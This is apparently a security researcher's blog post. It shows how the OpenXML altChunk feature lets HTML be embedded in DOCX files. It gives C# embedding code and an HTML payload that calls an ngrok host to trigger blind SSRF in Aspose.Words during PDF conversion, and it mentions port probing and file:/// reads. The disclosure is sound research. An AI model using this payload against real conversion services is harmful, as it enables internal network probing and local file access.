New year, new post!🥳
During a security research I found myself digging into a web application with a DOCX upload feature. It seemed so secure: how could I break it? I found that, in this particular case, I had to shake the foundations, so I started reading: Office OpenXML Reference.
Nothing particularly interesting, until I reached this section:
My eyes started blinking: there is an official supported feature in OpenXML standard that let me embed an HTML page within the document!
Reference documentation states this:
An alternative format import part allows content specified in an alternate format specified above to be embedded directly in a WordprocessingML document in order to allow that content to be migrated to the WordprocessingML format.
Embedding altChunk into a regular DOCX file
I wrote a simple C# program that embeds a choosen HTML/MHTML file into a DOCX:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
using DocumentFormat.OpenXml.Packaging;
using DocumentFormat.OpenXml.Wordprocessing;
using System.IO;
using System.Linq;
namespace Conversion
{
class Program
{
static void Main(string[] args)
{
string fileName2 = @"C:\PathToHTMLFile\Page.mht";
string fileName1 = @"C:\PathToOriginalDOCXFile\doc.docx";
using (WordprocessingDocument myDoc =
WordprocessingDocument.Open(fileName1, true))
{
string altChunkId = "AltChunkId1";
MainDocumentPart mainPart = myDoc.MainDocumentPart;
AlternativeFormatImportPart chunk =
mainPart.AddAlternativeFormatImportPart(
AlternativeFormatImportPartType.Mht, altChunkId);
using (FileStream fileStream = File.Open(fileName2, FileMode.Open))
chunk.FeedData(fileStream);
AltChunk altChunk = new AltChunk();
altChunk.Id = altChunkId;
mainPart.Document
.Body
.InsertAfter(altChunk, mainPart.Document.Body
.Elements<Paragraph>().Last());
mainPart.Document.Save();
}
}
}
}
A Penetration Tester perspective
Even if altChunk simplifies a lot document creation, it can be misused by an attacker. In fact it allows us to write HTML code that will be converted in WordProcessingML XML tags by Word internal engine or by associated parsing libraries.
We could possibly achieve things like:
- XSS
- SSRF
up to
- RCE
Let’s dive into a real world example…
Aspose.Words and altChunks
Let’s suppose we have an application that converts any DOCX file to PDF. Inspecting its behaviour we notice that we can’t trigger anything harmful by using macro, OLE objects, Fields and/or XXE.
So ugly, but we are interested in content, not shape!
Fortunately above feature comes to help us. By injecting in an HTML file this code block:
1
2
3
4
5
6
7
8
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<embed src="http://75bb-80-104-79-137.ngrok.io/a.png"></embed>
</body>
</html>
and then encapsulating it in the malicious DOCX file, we can force Word or a library to resolve this address while constructing output PDF.
We have in fact achieved a Blind SSRF.
We could then try these things:
- Check open/closed ports by observing timing response
- Open images by using any supported URI scheme (yes, even file:///)
NOTE: Above attack/behaviour works in the latest Aspose.Words package. I haven’t tried other packages yet, but this feature cannot be underestimated.
Stay tuned!
PS: Let me know in comments if you find another misuse of this feature!